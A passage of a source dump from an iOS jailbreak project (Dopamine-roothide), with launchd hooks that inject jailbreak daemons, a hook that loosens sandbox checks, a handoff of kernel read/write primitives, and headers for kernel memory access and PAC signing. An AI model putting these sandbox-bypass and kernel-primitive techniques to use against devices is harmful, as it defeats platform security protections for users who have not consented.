jbrootPath(@"/basebin/LaunchDaemons/com.opa334.idownloadd.plist"); 9 | NSString *idownloaddDisabledPath = jbrootPath(@"/basebin/LaunchDaemons/Disabled/com.opa334.idownloadd.plist"); 10 | if (argc == 2) { 11 | char *cmd = argv[1]; 12 | if (!strcmp(cmd, "start_idownload")) { 13 | if ([[NSFileManager defaultManager] fileExistsAtPath:idownloaddDisabledPath]) { 14 | [[NSFileManager defaultManager] moveItemAtPath:idownloaddDisabledPath toPath:idownloaddEnabledPath error:nil]; 15 | launchctl_load(idownloaddEnabledPath.fileSystemRepresentation, false); 16 | } 17 | return 0; 18 | } 19 | else if (!strcmp(cmd, "stop_idownload")) { 20 | if ([[NSFileManager defaultManager] fileExistsAtPath:idownloaddEnabledPath]) { 21 | launchctl_load(idownloaddEnabledPath.fileSystemRepresentation, true); 22 | [[NSFileManager defaultManager] moveItemAtPath:idownloaddEnabledPath toPath:idownloaddDisabledPath error:nil]; 23 | } 24 | return 0; 25 | } 26 | } 27 | launchctl_load(jbrootPath(@"/basebin/LaunchDaemons/com.opa334.jailbreakd.plist").fileSystemRepresentation, false); 28 | launchctl_load(jbrootPath(@"/basebin/LaunchDaemons/com.opa334.trustcache_rebuild.plist").fileSystemRepresentation, false); 29 | } -------------------------------------------------------------------------------- /BaseBin/launchdhook/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = launchdhook.dylib 2 | CC = clang 3 | 4 | CFLAGS = -Werror -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -O2 5 | LDFLAGS = -dynamiclib -rpath @loader_path/fallback -L../libjailbreak -L../_shared -ljailbreak -lellekit -lbsm -L../libfilecom -lfilecom 6 | 7 | sign: $(TARGET) 8 | @ldid -S $^ 9 | 10 | $(TARGET): $(wildcard src/*.m ../systemhook/src/common.c ../systemhook/src/envbuf.c) 11 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 12 | 13 | clean: 14 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/boomerang.h: -------------------------------------------------------------------------------- 1 | void boomerang_userspaceRebootIncoming(); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/boomerang.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import 5 | #import 6 | #import 7 | 8 | extern int (*posix_spawn_orig)(pid_t *restrict, const char *restrict, const posix_spawn_file_actions_t *restrict, const posix_spawnattr_t *restrict, char *const[restrict], char *const[restrict]); 9 | 10 | void boomerang_userspaceRebootIncoming() 11 | { 12 | // Fix Xcode debugging being broken after the userspace reboot 13 | // int retval = unmount("/Developer", MNT_FORCE); 14 | // JBLogDebug("unmount /Developer : %d %d,%s", retval, errno, strerror(errno)); 15 | 16 | pid_t boomerangPid = 0; 17 | 18 | // Wait until boomerang process has initialized primitives 19 | dispatch_semaphore_t sema = dispatch_semaphore_create(0); 20 | FCHandler *handler = [[FCHandler alloc] initWithReceiveFilePath:jbrootPath(@"/var/.communication/boomerang_to_launchd") sendFilePath:jbrootPath(@"/var/.communication/launchd_to_boomerang")]; 21 | __weak FCHandler *weakHandler = handler; 22 | handler.receiveHandler = ^(NSDictionary *message) { 23 | NSString *identifier = message[@"id"]; 24 | if (identifier) { 25 | if ([identifier isEqualToString:@"getPPLRW"]) { 26 | pid_t pid = [(NSNumber *)message[@"pid"] intValue]; 27 | int ret = handoffPPLPrimitives(pid); 28 | [weakHandler sendMessage:@{@"id" : @"receivePPLRW", @"errCode" : @(ret)}]; 29 | } 30 | else if ([identifier isEqualToString:@"signThreadState"]) { 31 | uint64_t actContextKptr = [(NSNumber*)message[@"actContext"] unsignedLongLongValue]; 32 | signState(actContextKptr); 33 | [weakHandler sendMessage:@{@"id" : @"signedThreadState"}]; 34 | } 35 | else if ([identifier isEqualToString:@"primitivesInitialized"]) 36 | { 37 | dispatch_semaphore_signal(sema); // DONE, exit 38 | } 39 | } 40 | }; 41 | 42 | int ret = posix_spawn_orig(&boomerangPid, jbrootPath(@"/basebin/boomerang").fileSystemRepresentation, NULL, NULL, NULL, NULL); 43 | if (ret != 0) return; 44 | 45 | JBLogDebug("boomerangPid=%d", boomerangPid); 46 | 47 | dispatch_semaphore_wait(sema, DISPATCH_TIME_FOREVER); 48 | } 49 | -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/crashreporter.h: -------------------------------------------------------------------------------- 1 | #import 2 | #include 3 | 4 | typedef int exception_type_t; 5 | typedef integer_t exception_data_type_t; 6 | 7 | #pragma pack(4) 8 | typedef struct { 9 | mach_msg_header_t header; 10 | mach_msg_body_t msgh_body; 11 | mach_msg_port_descriptor_t thread; 12 | mach_msg_port_descriptor_t task; 13 | int unused1; 14 | exception_type_t exception; 15 | exception_data_type_t code; 16 | int unused2; 17 | int subcode; 18 | NDR_record_t ndr; 19 | } exception_raise_request; // the bits we need at least 20 | #pragma pack() 21 | 22 | #pragma pack(4) 23 | typedef struct { 24 | mach_msg_header_t header; 25 | NDR_record_t ndr; 26 | kern_return_t retcode; 27 | } exception_raise_reply; 28 | #pragma pack() 29 | 30 | #pragma pack(4) 31 | typedef struct { 32 | mach_msg_header_t header; 33 | NDR_record_t ndr; 34 | kern_return_t retcode; 35 | int flavor; 36 | mach_msg_type_number_t new_stateCnt; 37 | natural_t new_state[614]; 38 | } exception_raise_state_reply; 39 | #pragma pack() 40 | 41 | typedef enum { 42 | kCrashReporterStateNotActive = 0, 43 | kCrashReporterStateActive = 1, 44 | kCrashReporterStatePaused = 2 45 | } crash_reporter_state; 46 | 47 | void crashreporter_start(void); 48 | void crashreporter_pause(void); 49 | void crashreporter_resume(void); 50 | 51 | FILE *crashreporter_open_outfile(const char *source, char **nameOut); 52 | void crashreporter_save_outfile(FILE *f); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/daemon_hook.h: -------------------------------------------------------------------------------- 1 | void initDaemonHooks(void); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/daemon_hook.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import 5 | #import "substrate.h" 6 | #import 7 | #import 8 | #import 9 | #import 10 | 11 | extern xpc_object_t xpc_create_from_plist(const void *buf, size_t len); 12 | 13 | void addLaunchDaemon(xpc_object_t xdict, const char *path) 14 | { 15 | int ldFd = open(path, O_RDONLY); 16 | if (ldFd >= 0) { 17 | struct stat s = {}; 18 | if(fstat(ldFd, &s) != 0) { 19 | close(ldFd); 20 | return; 21 | } 22 | size_t len = s.st_size; 23 | void *addr = mmap(NULL, len, PROT_READ, MAP_FILE | MAP_PRIVATE, ldFd, 0); 24 | if (addr) { 25 | xpc_object_t daemonXdict = xpc_create_from_plist(addr, len); 26 | if (daemonXdict) { 27 | xpc_dictionary_set_value(xdict, path, daemonXdict); 28 | } 29 | munmap(addr, len); 30 | } 31 | close(ldFd); 32 | } 33 | } 34 | 35 | xpc_object_t (*xpc_dictionary_get_value_orig)(xpc_object_t xdict, const char *key); 36 | xpc_object_t xpc_dictionary_get_value_hook(xpc_object_t xdict, const char *key) 37 | { 38 | xpc_object_t orgValue = xpc_dictionary_get_value_orig(xdict, key); 39 | if (!strcmp(key, "LaunchDaemons")) { 40 | addLaunchDaemon(orgValue, jbrootPath(@"/basebin/LaunchDaemons/com.opa334.jailbreakd.plist").fileSystemRepresentation); 41 | addLaunchDaemon(orgValue, jbrootPath(@"/basebin/LaunchDaemons/com.opa334.trustcache_rebuild.plist").fileSystemRepresentation); 42 | // for (NSString *daemonPlistName in [[NSFileManager defaultManager] contentsOfDirectoryAtPath:jbrootPath(@"/Library/LaunchDaemons") error:nil]) { 43 | // if ([daemonPlistName.pathExtension isEqualToString:@"plist"]) { 44 | // addLaunchDaemon(orgValue, [jbrootPath(@"/Library/LaunchDaemons") stringByAppendingPathComponent:daemonPlistName].fileSystemRepresentation); 45 | // } 46 | // } 47 | } 48 | else if (!strcmp(key, "Paths")) { 49 | xpc_array_set_string(orgValue, XPC_ARRAY_APPEND, jbrootPath(@"/basebin/LaunchDaemons").fileSystemRepresentation); 50 | //xpc_array_set_string(orgValue, XPC_ARRAY_APPEND, jbrootPath(@"/Library/LaunchDaemons").fileSystemRepresentation); 51 | } 52 | return orgValue; 53 | } 54 | 55 | void initDaemonHooks(void) 56 | { 57 | MSHookFunction(&xpc_dictionary_get_value, (void *)xpc_dictionary_get_value_hook, (void **)&xpc_dictionary_get_value_orig); 58 | } -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/ipc_hook.h: -------------------------------------------------------------------------------- 1 | void initIPCHooks(void); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/ipc_hook.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import 5 | #import "substrate.h" 6 | 7 | /* csops operations */ 8 | #define CS_OPS_STATUS 0 /* return status */ 9 | #define CS_PLATFORM_BINARY 0x04000000 /* this is a platform binary */ 10 | int csops(pid_t pid, unsigned int ops, void * useraddr, size_t usersize); 11 | 12 | NSString* getAppIdentifierForPath(const char* path); 13 | BOOL roothideBlacklistedApp(NSString* identifier); 14 | 15 | int (*sandbox_check_by_audit_token_orig)(audit_token_t au, const char *operation, int sandbox_filter_type, ...); 16 | int sandbox_check_by_audit_token_hook(audit_token_t au, const char *operation, int sandbox_filter_type, ...) 17 | { 18 | va_list a; 19 | va_start(a, sandbox_filter_type); 20 | const char *name = va_arg(a, const char *); 21 | const void *arg2 = va_arg(a, void *); 22 | const void *arg3 = va_arg(a, void *); 23 | const void *arg4 = va_arg(a, void *); 24 | const void *arg5 = va_arg(a, void *); 25 | const void *arg6 = va_arg(a, void *); 26 | const void *arg7 = va_arg(a, void *); 27 | const void *arg8 = va_arg(a, void *); 28 | const void *arg9 = va_arg(a, void *); 29 | const void *arg10 = va_arg(a, void *); 30 | va_end(a); 31 | if (name && operation) { 32 | pid_t pid = audit_token_to_pid(au); 33 | uid_t uid = audit_token_to_euid(au); 34 | 35 | uint32_t csFlags = 0; 36 | csops(pid, CS_OPS_STATUS, &csFlags, sizeof(csFlags)); 37 | 38 | bool allow=false; 39 | if(strcmp(operation, "mach-lookup") == 0) { 40 | volatile int result1 = strncmp((char *)name, "cy:", 3); 41 | volatile int result2 = strncmp((char *)name, "lh:", 3); 42 | if (result1 == 0 || result2 == 0) { 43 | allow = true; 44 | } 45 | } 46 | 47 | if(uid==501 && (csFlags & CS_PLATFORM_BINARY)==0) 48 | { 49 | char pathbuf[4*MAXPATHLEN]={0}; 50 | if(pid>0 && proc_pidpath(pid, pathbuf, sizeof(pathbuf))>0) 51 | { 52 | NSString* appIdentifier = getAppIdentifierForPath(pathbuf); 53 | if(appIdentifier && roothideBlacklistedApp(appIdentifier)) { 54 | JBLogDebug("sandbox_check_by_audit_token operation=%s name=%s from %s", operation, name, pathbuf); 55 | allow = false; 56 | } 57 | } 58 | } 59 | 60 | if(allow) return 0; 61 | } 62 | return sandbox_check_by_audit_token_orig(au, operation, sandbox_filter_type, name, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10); 63 | } 64 | 65 | void initIPCHooks(void) 66 | { 67 | MSHookFunction(&sandbox_check_by_audit_token, (void *)sandbox_check_by_audit_token_hook, (void **)&sandbox_check_by_audit_token_orig); 68 | } -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/spawn_hook.h: -------------------------------------------------------------------------------- 1 | void initSpawnHooks(void); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/xpc_hook.h: -------------------------------------------------------------------------------- 1 | void initXPCHooks(void); -------------------------------------------------------------------------------- /BaseBin/libfilecom/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = libfilecom.dylib 2 | 3 | CC = clang 4 | 5 | CFLAGS = -Werror -framework Foundation -framework CoreServices -framework Security -framework IOKit -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -Wno-nullability-completeness-on-arrays -dynamiclib -install_name @loader_path/$(TARGET) -O2 6 | 7 | sign: $(TARGET) 8 | @ldid -S $< 9 | 10 | $(TARGET): $(wildcard src/*.m) 11 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 12 | 13 | clean: 14 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/libfilecom/src/FCHandler.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | @interface FCHandler : NSObject 4 | { 5 | NSString *_receiveFilePath; 6 | NSString *_sendFilePath; 7 | int _receiveFd; 8 | dispatch_source_t _dispatchSource; 9 | dispatch_queue_t _sendQueue; 10 | dispatch_queue_t _receiveQueue; 11 | BOOL _ignoreIncoming; 12 | } 13 | 14 | @property (nonatomic, copy) void (^receiveHandler)(NSDictionary *); 15 | 16 | - (instancetype)initWithReceiveFilePath:(NSString *)receiveFilePath sendFilePath:(NSString *)sendFilePath; 17 | 18 | - (BOOL)sendMessage:(NSDictionary *)message; 19 | - (void)receivedMessage:(NSDictionary *)message; 20 | 21 | 22 | @end -------------------------------------------------------------------------------- /BaseBin/libintl.8.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/BaseBin/libintl.8.dylib -------------------------------------------------------------------------------- /BaseBin/libjailbreak/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = libjailbreak.dylib 2 | 3 | CC = clang 4 | 5 | CFLAGS = -Werror -framework Foundation -framework CoreServices -framework Security -framework IOKit -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -Wno-nullability-completeness-on-arrays -dynamiclib -install_name @loader_path/$(TARGET) -O3 6 | LDFLAGS = -lbsm -L../libfilecom -lfilecom -L../ChOma/output/ios/lib/ -lchoma 7 | 8 | sign: $(TARGET) 9 | @ldid -S $< 10 | 11 | $(TARGET): $(wildcard src/*.m src/*.c src/*.S) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | 14 | clean: 15 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/RemoteLog.h: -------------------------------------------------------------------------------- 1 | #ifndef _REMOTE_LOG_H_ 2 | #define _REMOTE_LOG_H_ 3 | 4 | #import 5 | #import 6 | #import 7 | #import 8 | #include 9 | #include 10 | 11 | // change this to match your destination (server) IP address 12 | #define RLOG_IP_ADDRESS "255.255.255.255" 13 | #define RLOG_PORT 11909 14 | 15 | int sd=0; 16 | struct sockaddr_in broadcastAddr={0}; 17 | 18 | __attribute__((unused)) static void RLogv(NSString* format, va_list args) 19 | { 20 | NSString* str = [[NSString alloc] initWithFormat:format arguments:args]; 21 | 22 | //static int inited=0; 23 | //if(inited==0) 24 | { 25 | //inited=1; 26 | printf("[RemoteLog] init\n"); 27 | 28 | sd = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP); 29 | if (sd <= 0) 30 | { 31 | printf("[RemoteLog] Error: Could not open socket\n"); 32 | return; 33 | } 34 | 35 | int broadcastEnable = 1; 36 | int ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &broadcastEnable, sizeof(broadcastEnable)); 37 | if (ret) 38 | { 39 | printf("[RemoteLog] Error: Could not open set socket to broadcast mode\n"); 40 | close(sd); 41 | return; 42 | } 43 | 44 | // int sendbufsize = 1024*1024*5; //max on ios 45 | // ret = setsockopt(sd, SOL_SOCKET, SO_SNDBUF, &sendbufsize, sizeof(sendbufsize)); 46 | // if (ret) 47 | // { 48 | // printf("[RemoteLog] Error: Could not set sock buf size, %d, %s\n", errno, strerror(errno)); 49 | // close(sd); 50 | // return; 51 | // } 52 | 53 | memset(&broadcastAddr, 0, sizeof broadcastAddr); 54 | broadcastAddr.sin_family = AF_INET; 55 | inet_pton(AF_INET, RLOG_IP_ADDRESS, &broadcastAddr.sin_addr); 56 | broadcastAddr.sin_port = htons(RLOG_PORT); 57 | 58 | } 59 | 60 | char* request = (char*)[str UTF8String]; 61 | int ret = sendto(sd, request, strlen(request), 0, (struct sockaddr*)&broadcastAddr, sizeof broadcastAddr); 62 | 63 | if (ret < 0) 64 | { 65 | printf("[RemoteLog] Error: Could not send broadcast, %d, %s\n", errno, strerror(errno)); 66 | //close(sd); 67 | return; 68 | } 69 | 70 | close(sd); 71 | 72 | //printf("send %s\n", request); 73 | } 74 | 75 | __attribute__((unused)) static void RLog(NSString* format, ...) 76 | { 77 | va_list args; 78 | va_start(args, format); 79 | RLogv(format, args); 80 | va_end(args); 81 | } 82 | 83 | 84 | #endif 85 | -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/boot_info.h: -------------------------------------------------------------------------------- 1 | __kindof NSObject *bootInfo_getObject(NSString *name); 2 | void bootInfo_setObject(NSString *name, __kindof NSObject *object); 3 | 4 | uint64_t bootInfo_getUInt64(NSString *name); 5 | uint64_t bootInfo_getSlidUInt64(NSString *name); 6 | NSData *bootInfo_getData(NSString *name); 7 | NSArray *bootInfo_getArray(NSString *name); 8 | -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/boot_info.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "util.h" 3 | 4 | #define BOOT_INFO_PATH jbrootPath(@"/var/.boot_info.plist") 5 | 6 | void bootInfo_setObject(NSString *name, __kindof NSObject *object) 7 | { 8 | NSURL *bootInfoURL = [NSURL fileURLWithPath:BOOT_INFO_PATH isDirectory:NO]; 9 | NSMutableDictionary *bootInfo = [NSDictionary dictionaryWithContentsOfURL:bootInfoURL error:nil].mutableCopy ?: [NSMutableDictionary new]; 10 | if (object) { 11 | bootInfo[name] = object; 12 | } 13 | else { 14 | [bootInfo removeObjectForKey:name]; 15 | } 16 | [bootInfo writeToURL:bootInfoURL atomically:YES]; 17 | } 18 | 19 | __kindof NSObject *bootInfo_getObject(NSString *name) 20 | { 21 | NSURL *bootInfoURL = [NSURL fileURLWithPath:BOOT_INFO_PATH isDirectory:NO]; 22 | NSDictionary *bootInfo = [NSDictionary dictionaryWithContentsOfURL:bootInfoURL error:nil]; 23 | return bootInfo[name]; 24 | } 25 | 26 | uint64_t bootInfo_getUInt64(NSString *name) 27 | { 28 | NSNumber* num = bootInfo_getObject(name); 29 | if ([num isKindOfClass:NSNumber.class]) 30 | { 31 | return num.unsignedLongLongValue; 32 | } 33 | return 0; 34 | } 35 | 36 | uint64_t bootInfo_getSlidUInt64(NSString *name) 37 | { 38 | uint64_t kernelslide = bootInfo_getUInt64(@"kernelslide"); 39 | return bootInfo_getUInt64(name) + kernelslide; 40 | } 41 | 42 | NSData *bootInfo_getData(NSString *name) 43 | { 44 | NSData* data = bootInfo_getObject(name); 45 | if ([data isKindOfClass:NSData.class]) 46 | { 47 | return data; 48 | } 49 | return nil; 50 | } 51 | 52 | NSArray *bootInfo_getArray(NSString *name) 53 | { 54 | NSArray* array = bootInfo_getObject(name); 55 | if ([array isKindOfClass:NSArray.class]) 56 | { 57 | return array; 58 | } 59 | return nil; 60 | } -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/handoff.h: -------------------------------------------------------------------------------- 1 | int handoffPPLPrimitives(pid_t pid); 2 | -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/jailbreakd.h: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | 4 | typedef enum { 5 | JBD_MSG_GET_STATUS = 0, 6 | JBD_MSG_PPL_INIT = 1, 7 | JBD_MSG_PAC_INIT = 2, 8 | JBD_MSG_PAC_FINALIZE = 3, 9 | 10 | JBD_MSG_HANDOFF_PPL = 10, 11 | JBD_MSG_DO_KCALL = 11, 12 | JBD_MSG_DO_KCALL_THREADSTATE = 12, 13 | JBD_MSG_INIT_ENVIRONMENT = 13, 14 | JBD_MSG_JBUPDATE = 14, 15 | 16 | JBD_MSG_REBUILD_TRUSTCACHE = 20, 17 | JBD_MSG_SETUID_FIX = 21, 18 | JBD_MSG_PROCESS_BINARY = 22, 19 | JBD_MSG_PROC_SET_DEBUGGED = 23, 20 | JBD_MSG_DEBUG_ME = 24, 21 | JBD_MSG_FORK_FIX = 25, 22 | JBD_MSG_INTERCEPT_USERSPACE_PANIC = 26, 23 | 24 | JBD_SET_FAKELIB_VISIBLE = 30, 25 | 26 | 27 | JBD_MSG_REBOOT_USERSPACE = 1000, 28 | JBD_MSG_PATCH_SPAWN = 1001, 29 | JBD_MSG_PATCH_EXEC_ADD = 1002, 30 | JBD_MSG_PATCH_EXEC_DEL = 1003, 31 | 32 | } JBD_MESSAGE_ID; 33 | 34 | typedef enum { 35 | JBD_ERR_PRIMITIVE_NOT_INITIALIZED = 0, 36 | JBD_ERR_NOT_PERMITTED = 1, 37 | } JBD_ERR_ID; 38 | 39 | typedef struct { 40 | uint64_t x[29]; 41 | uint64_t lr; 42 | uint64_t sp; 43 | uint64_t pc; 44 | } KcallThreadState; 45 | 46 | extern bool gIsJailbreakd; 47 | 48 | uint64_t jbdParseNumUInt64(NSNumber *num); 49 | uint64_t jbdParseNumInt64(NSNumber *num); 50 | bool jbdParseBool(NSNumber *num); 51 | 52 | mach_port_t jbdMachPort(void); 53 | xpc_object_t sendJBDMessage(xpc_object_t message); 54 | 55 | void jbdGetStatus(uint64_t *PPLRWStatus, uint64_t *kcallStatus, pid_t *pid); 56 | void jbdTransferPPLRW(void); 57 | uint64_t jbdTransferKcall(); 58 | void jbdFinalizeKcall(void); 59 | 60 | uint64_t jbdGetPPLRWPage(int64_t* errOut); 61 | int jbdInitPPLRW(void); 62 | uint64_t jbdKcallThreadState(KcallThreadState *threadState, bool raw); 63 | uint64_t jbdKcall(uint64_t func, uint64_t argc, const uint64_t *argv); 64 | uint64_t jbdKcall8(uint64_t func, uint64_t a1, uint64_t a2, uint64_t a3, uint64_t a4, uint64_t a5, uint64_t a6, uint64_t a7, uint64_t a8); 65 | int64_t jbdInitEnvironment(void); 66 | 67 | int64_t jbdUpdateFromTIPA(NSString *pathToTIPA, bool rebootWhenDone); 68 | int64_t jbdUpdateFromBasebinTar(NSString *pathToBasebinTar, bool rebootWhenDone); 69 | 70 | int64_t jbdRebuildTrustCache(void); 71 | int64_t jbdProcessBinary(const char *filePath); 72 | int64_t jbdProcSetDebugged(pid_t pid); 73 | 74 | int64_t jbdRebootUserspace(void); 75 | -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/kcall.h: -------------------------------------------------------------------------------- 1 | #import 2 | #import "jailbreakd.h" 3 | 4 | typedef enum { 5 | kKcallStatusNotInitialized = 0, 6 | kKcallStatusPrepared = 1, 7 | kKcallStatusFinalized = 2 8 | } KcallStatus; 9 | 10 | typedef struct { 11 | uint64_t unk; //??arm_state_hdr_t ash{uint32_t flavor;uint32_t count;} 12 | uint64_t x[29]; 13 | uint64_t fp; 14 | uint64_t lr; 15 | uint64_t sp; 16 | uint64_t pc; 17 | uint32_t cpsr; 18 | // Other stuff 19 | uint64_t other[70]; 20 | } kRegisterState; //size=0x348, but ARM_CONTEXT_SIZE=0x350 21 | 22 | struct arm_kernel_saved_state { 23 | uint64_t x[10]; /* General purpose registers x19-x28 */ 24 | uint64_t fp; /* Frame pointer x29 */ 25 | uint64_t lr; /* Link register x30 */ // RETAA via cswitch_epilogue 26 | uint64_t sp; /* Stack pointer x31 */ // important! 27 | uint64_t pc; /* Program counter */ // always zero 28 | } __attribute__((aligned(16))); 29 | 30 | extern KcallStatus gKCallStatus; 31 | 32 | void pac_loop(void); 33 | 34 | uint64_t kcall(uint64_t func, uint64_t argc, const uint64_t *argv); 35 | uint64_t kcall8(uint64_t func, uint64_t a1, uint64_t a2, uint64_t a3, uint64_t a4, uint64_t a5, uint64_t a6, uint64_t a7, uint64_t a8); 36 | uint64_t kcall_with_raw_thread_state(KcallThreadState threadState); 37 | uint64_t kcall_with_thread_state(KcallThreadState threadState); 38 | uint64_t initPACPrimitives(uint64_t kernelAllocation); 39 | void finalizePACPrimitives(void); 40 | int signState(uint64_t actContext); 41 | int recoverPACPrimitives(); 42 | void destroyPACPrimitives(void); -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/launchd.h: -------------------------------------------------------------------------------- 1 | #import 2 | xpc_object_t launchd_xpc_send_message(xpc_object_t xdict); 3 | 4 | typedef enum { 5 | LAUNCHD_JB_MSG_ID_GET_PPLRW, 6 | LAUNCHD_JB_MSG_ID_SIGN_STATE 7 | } LAUNCHD_JB_MSG; 8 | 9 | void patchBaseBinLaunchDaemonPlist(NSString *plistPath); 10 | void patchBaseBinLaunchDaemonPlists(void); -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/libjailbreak.h: -------------------------------------------------------------------------------- 1 | #import "boot_info.h" 2 | #import "handoff.h" 3 | #import "jailbreakd.h" 4 | #import "pplrw.h" 5 | #import "pte.h" 6 | #import "kcall.h" 7 | #import "util.h" 8 | #import "log.h" -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/log.h: -------------------------------------------------------------------------------- 1 | //#define ENABLE_LOGS 2 | 3 | #ifdef ENABLE_LOGS 4 | void JBLogDebug(const char *format, ...); 5 | void JBLogError(const char *format, ...); 6 | #else 7 | #define JBLogDebug(format ...) 8 | #define JBLogError(format ...) 9 | #endif 10 | 11 | //#define JBLogDebug(format ...) NSLog(@format) 12 | //#define JBLogError(format ...) NSLog(@format) 13 | -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/macho.h: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import 5 | #import 6 | #import 7 | #import 8 | #import 9 | #import 10 | #import "csblob.h" 11 | 12 | void machoEnumerateArchs(FILE* machoFile, void (^archEnumBlock)(struct fat_arch* arch, uint32_t archMetadataOffset, uint32_t archOffset, BOOL* stop)); 13 | void machoGetInfo(FILE* candidateFile, bool *isMachoOut, bool *isLibraryOut); 14 | int64_t machoFindArch(FILE *machoFile, uint32_t subtypeToSearch); 15 | int64_t machoFindBestArch(FILE *machoFile); 16 | 17 | void machoEnumerateLoadCommands(FILE *machoFile, uint32_t archOffset, void (^enumerateBlock)(struct load_command cmd, uint32_t cmdOffset)); 18 | void machoFindLoadCommand(FILE *machoFile, uint32_t cmd, void *lcOut, size_t lcSize); 19 | void machoFindCSData(FILE* machoFile, uint32_t archOffset, uint32_t* outOffset, uint32_t* outSize); 20 | 21 | void machoEnumerateDependencies(FILE *machoFile, uint32_t archOffset, NSString *machoPath, NSString *executablePath, void (^enumerateBlock)(NSString *dependencyPath)); 22 | 23 | void machoCSDataEnumerateBlobs(FILE *machoFile, uint32_t CSDataStart, uint32_t CSDataSize, void (^enumerateBlock)(struct CSBlob blobDescriptor, uint32_t blobDescriptorOffset, BOOL *stop)); 24 | NSData *machoCSDataCalculateCDHash(FILE *machoFile, uint32_t CSDataStart, uint32_t CSDataSize); 25 | bool machoCSDataIsAdHocSigned(FILE *machoFile, uint32_t CSDataStart, uint32_t CSDataSize); -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/pac.S: -------------------------------------------------------------------------------- 1 | .text 2 | 3 | .align 4 4 | 5 | .global _pac_loop 6 | _pac_loop: 7 | mov x0, #1 8 | adrp x1, _gUserReturnDidHappen@PAGE 9 | str x0, [x1, _gUserReturnDidHappen@PAGEOFF] 10 | b _pac_loop -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/patchfind.h: -------------------------------------------------------------------------------- 1 | void *patchfind_seek_back(void *startPtr, uint32_t toInstruction, uint32_t mask, unsigned int maxSearch); 2 | void *patchfind_find(int imageIndex, unsigned char *bytesToSearch, unsigned char *byteMask, size_t byteCount); -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/pplrw.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | #define PPLRW_USER_MAPPING_OFFSET 0x7000000000 4 | #define PPLRW_USER_MAPPING_TTEP_IDX (PPLRW_USER_MAPPING_OFFSET / 0x1000000000) 5 | 6 | typedef enum { 7 | kPPLRWStatusNotInitialized = 0, 8 | kPPLRWStatusInitialized = 1 9 | } PPLRWStatus; 10 | extern PPLRWStatus gPPLRWStatus; 11 | 12 | uint64_t unsign_kptr(uint64_t a); 13 | 14 | uint64_t phystokv(uint64_t pa); 15 | uint64_t vtophys(uint64_t ttep, uint64_t va); 16 | uint64_t kvtophys(uint64_t va); 17 | void *phystouaddr(uint64_t pa); 18 | void *kvtouaddr(uint64_t va); 19 | 20 | uint64_t kaddr_to_pa(uint64_t virt, bool *err); 21 | 22 | int physreadbuf(uint64_t physaddr, void* output, size_t size); 23 | int physwritebuf(uint64_t physaddr, const void* input, size_t size); 24 | int kreadbuf(uint64_t kaddr, void* output, size_t size); 25 | int kwritebuf(uint64_t kaddr, const void* input, size_t size); 26 | 27 | uint64_t physread64(uint64_t pa); 28 | uint64_t physread_ptr(uint64_t va); 29 | uint32_t physread32(uint64_t pa); 30 | uint16_t physread16(uint64_t pa); 31 | uint8_t physread8(uint64_t pa); 32 | 33 | int physwrite64(uint64_t pa, uint64_t v); 34 | int physwrite32(uint64_t pa, uint32_t v); 35 | int physwrite16(uint64_t pa, uint16_t v); 36 | int physwrite8(uint64_t pa, uint8_t v); 37 | 38 | uint64_t kread64(uint64_t va); 39 | uint64_t kread_ptr(uint64_t va); 40 | uint32_t kread32(uint64_t va); 41 | uint16_t kread16(uint64_t va); 42 | uint8_t kread8(uint64_t va); 43 | 44 | int kwrite64(uint64_t va, uint64_t v); 45 | int kwrite32(uint64_t va, uint32_t v); 46 | int kwrite16(uint64_t va, uint16_t v); 47 | int kwrite8(uint64_t va, uint8_t v); 48 | 49 | void initPPLPrimitives(void); 50 | 51 | -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/signatures.h: 